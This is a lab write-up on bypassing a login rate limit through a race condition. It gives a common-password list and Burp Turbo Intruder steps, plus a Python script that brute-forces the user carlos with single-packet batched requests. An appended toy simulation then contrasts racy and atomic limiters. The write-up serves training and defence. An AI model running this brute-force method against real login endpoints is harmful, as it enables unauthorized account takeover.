9.2 Lab: Bypassing rate limits via race conditions | 2024
2024-2-28 03:46:11 Author: infosecwriteups.com

Karthikeyan Nagaraj

InfoSec Write-ups

This lab’s login mechanism uses rate limiting to defend against brute-force attacks. However, this can be bypassed due to a race condition.

To solve the lab:

  1. Work out how to exploit the race condition to bypass the rate limit.
  2. Successfully brute-force the password for the user carlos.
  3. Log in and access the admin panel.
  4. Delete the user carlos.

You can log in to your account with the following credentials: wiener:peter.

You should use the following list of potential passwords:

123123
abc123
football
monkey
letmein
shadow
master
666666
qwertyuiop
123321
mustang
123456
password
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
1234567890
michael
x654321
superman
1qaz2wsx
baseball
7777777
121212
000000

  1. Try to log in as the user carlos with a wrong password and capture the request.
  2. Send it to Repeater for testing.
  3. Install Turbo Intruder from Extensions → BApp Store.
  4. In Repeater, select the value of the password, then right-click → Extensions → Turbo Intruder → Send to Turbo Intruder.
  5. Paste the Python code below into the script window:
def queueRequests(target, wordlists):

    # as the target supports HTTP/2, use engine=Engine.BURP2 and concurrentConnections=1 for a single-packet attack
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )

    # assign the list of candidate passwords from your clipboard
    passwords = wordlists.clipboard

    # queue a login request using each password from the wordlist
    # the 'gate' argument withholds the final part of each request until engine.openGate() is invoked
    for password in passwords:
        engine.queue(target.req, password, gate='1')

    # once every request has been queued
    # invoke engine.openGate() to send all requests in the given gate simultaneously
    engine.openGate('1')


def handleResponse(req, interesting):
    table.add(req)

  6. Now copy the password list to your clipboard (the script reads it through wordlists.clipboard) and start the attack.
  7. Look for a response with a 302 status code. If there is none, start the attack again, or restart the lab and repeat the steps.
  8. Once you have found the password, log in to carlos's account. If the page shows a wait time, wait for it to pass and then log in.
  9. Navigate to the admin panel and delete the user carlos to solve the lab.
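The lab is solvable because the limiter reads the attempt counter and writes it back as two separate steps, so requests that land in the same instant all see the stale count and all pass the check. As an added example that is not part of the original writeup, here is a toy in-process limiter written both ways, with a constructed sleep standing in for the datastore round trip between check and increment; the class names and the simulate helper are assumptions made here, not anything from the lab.

```python
import threading
import time
from concurrent.futures import ThreadPoolExecutor

GAP = 0.02  # simulated datastore round trip between reading and writing the counter (constructed value)

class RacyRateLimiter:
    """Check-then-increment with no synchronisation: every request that reads the counter
    before the first write lands sees the same stale value and is admitted."""
    def __init__(self, limit):
        self.limit, self.attempts = limit, {}

    def allow(self, user):
        count = self.attempts.get(user, 0)  # time of check
        if count >= self.limit:
            return False
        time.sleep(GAP)                      # the window in which concurrent requests interleave
        self.attempts[user] = count + 1      # time of use
        return True

class AtomicRateLimiter:
    """Same logic with check and increment serialised as one unit. In a real deployment the
    equivalent is an atomic increment in the shared store (e.g. Redis INCR); a process-local
    lock does not span several application servers."""
    def __init__(self, limit):
        self.limit, self.attempts, self.lock = limit, {}, threading.Lock()

    def allow(self, user):
        with self.lock:
            count = self.attempts.get(user, 0)
            if count >= self.limit:
                return False
            time.sleep(GAP)                  # same round trip, but nothing can interleave
            self.attempts[user] = count + 1
            return True

def simulate(limiter, user, requests):
    """Release `requests` attempts for `user` in the same instant; return how many were admitted."""
    barrier = threading.Barrier(requests)
    def attempt(_):
        barrier.wait()                       # every thread reaches the check at the same moment
        return limiter.allow(user)

    with ThreadPoolExecutor(max_workers=requests) as pool:
        return sum(pool.map(attempt, range(requests)))

if __name__ == "__main__":
    print("racy limiter admitted:", simulate(RacyRateLimiter(3), "carlos", 20))    # well above 3
    print("atomic limiter admitted:", simulate(AtomicRateLimiter(3), "carlos", 20))  # exactly 3
```

The 302 in step 7 corresponds to the racy case: the first few responses are all evaluated before any attempt has been counted against the limit.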


Article source: https://infosecwriteups.com/9-2-lab-bypassing-rate-limits-via-race-conditions-2024-533185d6d94e?source=rss----7b722bfd1b8d---4